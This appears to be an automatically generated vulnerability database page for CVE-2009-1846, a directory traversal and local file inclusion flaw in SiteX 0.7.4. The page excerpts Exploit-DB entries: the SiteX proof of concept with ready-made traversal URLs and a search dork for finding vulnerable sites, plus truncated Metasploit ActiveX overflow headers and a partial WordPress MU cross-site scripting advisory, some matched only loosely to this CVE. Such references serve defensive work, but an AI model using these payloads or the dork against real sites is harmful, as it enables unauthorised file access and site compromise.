CVE-2009-1846
published 2009-06-01CVE-2009-1846: Multiple directory traversal vulnerabilities in SiteX 0.7.4 Build 418 and earlier allow remote attackers to include and execute arbitrary local files via a .…
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.30%
81.1th percentile
Multiple directory traversal vulnerabilities in SiteX 0.7.4 Build 418 and earlier allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the THEME_FOLDER parameter to (1) Corporate/homepage.php, (2) Fusion/homepage.php, (3) Joombo/homepage.php, (4) Streamline/homepage.php, and (5) Structure/homepage.php in themes/.
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bjsintay | sitex | <= 0.7.4 | — |
| bjsintay | sitex | — | — |
| bjsintay | sitex | — | — |
| bjsintay | sitex | — | — |
| bjsintay | sitex | — | — |
| bjsintay | sitex | — | — |
| bjsintay | sitex | — | — |
| bjsintay | sitex | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Symantec ConsoleUtilities - ActiveX Control Buffer Overflow (Metasploit)
exploitdb·2010-11-11
CVE-2009-3031 Symantec ConsoleUtilities - ActiveX Control Buffer Overflow (Metasploit)
Symantec ConsoleUtilities - ActiveX Control Buffer Overflow (Metasploit)
---
##
# $Id: symantec_consoleutilities_browseandsavefile.rb 10998 2010-11-11 22:43:22Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Symantec ConsoleUtilities ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Symantecs ConsoleUtilities.
By sending an overly long string to the "BrowseAndSaveFile()" method located
in the AeXNSConsoleUtilities.dll (6.0.0.1846) Control, an attacker may be able to
execute arbit
Exploit-DB
Symantec ConsoleUtilities - ActiveX Buffer Overflow (Metasploit)
exploitdb·2009-11-02
CVE-2009-3031 Symantec ConsoleUtilities - ActiveX Buffer Overflow (Metasploit)
Symantec ConsoleUtilities - ActiveX Buffer Overflow (Metasploit)
---
##
# Use it only for education or ethical pentesting! The author accepts no liability for damage caused by this tool.
##
require 'msf/core'
class Metasploit3 'Symantec ConsoleUtilities ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in Symantecs ConsoleUtilities.
By sending an overly long string to the "BrowseAndSaveFile()" method located
in the AeXNSConsoleUtilities.dll (6.0.0.1846) Control, an attacker may be able to
execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'Nikolas Sotiriu (lofi)' ],
'Version' => '1.0',
'References' =>
[
[ 'CVE', '2009-3031'],
[ 'URL', 'http://sotiriu.de/adv/NSOADV-2009-001.txt' ],
[ 'URL', 'http://www.symantec.com/business/sec
Exploit-DB
SiteX 0.7.4.418 - 'THEME_FOLDER' Local File Inclusion
exploitdb·2009-05-27
CVE-2009-1846 SiteX 0.7.4.418 - 'THEME_FOLDER' Local File Inclusion
SiteX 0.7.4.418 - 'THEME_FOLDER' Local File Inclusion
---
=-=-local file include-=-=
script:SiteX_074_build_418.zip
Author: ahmadbady
my site :Coming Soon
download from:http://sourceforge.net/project/showfiles.php?group_id=121558&package_id=290027
vul:/themes/themes_folders/homepage.php
<?PHP
include("themes/$THEME_FOLDER/header.php"); line 2
--
xpl:
path/themes/Corporate/homepage.php?THEME_FOLDER=../../../boot.ini%00
path/themes/Fusion/homepage.php?THEME_FOLDER=../../../boot.ini%00
path/themes/Joombo/homepage.ph?THEME_FOLDER=../../../boot.ini%00
path/themes/Streamline/homepage.php?THEME_FOLDER=../../../boot.ini%00
path/themes/Structure/homepage.php?THEME_FOLDER=../../../boot.ini%00
dork:"Powered by SiteX 0.7 Beta"
# milw0rm.com [2009-05-27]
Exploit-DB
WordPress MU < 2.7 - 'HOST' HTTP Header Cross-Site Scripting
exploitdb·2009-03-10
CVE-2009-1030 WordPress MU < 2.7 - 'HOST' HTTP Header Cross-Site Scripting
WordPress MU
1833
1834
1835
1836
1837 ID );
1839 if( count( $all_blogs ) > 1 ) {
1840 $primary_blog = get_usermeta($current_user->ID,
'primary_blog');
1841 ?>
1842
1843
1844 userblog_id
?>'userblog_id ) echo '
selected="selected"' ?>>http://domain.$blog->path
?>
1845
1846
1847
1852
1853
1854
1855 "
http://www.example.com/wp-admin/profile.php> tmp.html
$ firefox tmp.html
The javascript code will be executed in the context of the victim
browser, this can be exploited to steal cookies and escalate
privileges to administrator.
Tested with Wordpress MU 2.6.5, Apache 2.2 and Mozilla Firefox 3.0.6
V. BUSINESS IMPACT
The impact is the attacker can gain administrator privileges on the
application.
VI. SYSTEMS AFFECTED
Versions prior to 2.7 are affected
VII. SOLUTION
Upgrade to version 2.7 of w
No writeups or analysis indexed.
2009-06-01
Published